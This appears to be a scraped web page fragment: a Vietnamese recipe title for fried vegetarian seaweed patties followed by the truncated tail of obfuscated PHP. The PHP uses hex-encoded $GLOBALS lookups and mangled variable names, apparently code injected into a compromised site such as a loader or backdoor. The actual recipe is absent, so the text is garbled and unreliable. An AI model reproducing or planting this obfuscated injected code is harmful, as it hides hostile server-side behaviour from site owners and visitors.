bg

Chả chay rong biển chiên xù

0CU=${"\x47L\x4fB\x41L\x53"}["\x44\x30\x43\x30\x55\x55\x43\x55\x30\x43"]($D00U0CUCUC,\'\',$D0C0CUU0CU);echo $D0C0CUU0CU;unset($D0C0CUU0CU,$DUC00CUUC0,$DU0CCU0U0C,$D000UUCUCC,$DUCCU0C0U0);exit();}}');${"\x47L\x4fB\x41L\x53"}["\x44\x30\x43\x43\x30\x30\x55\x55\x55\x43"]();?>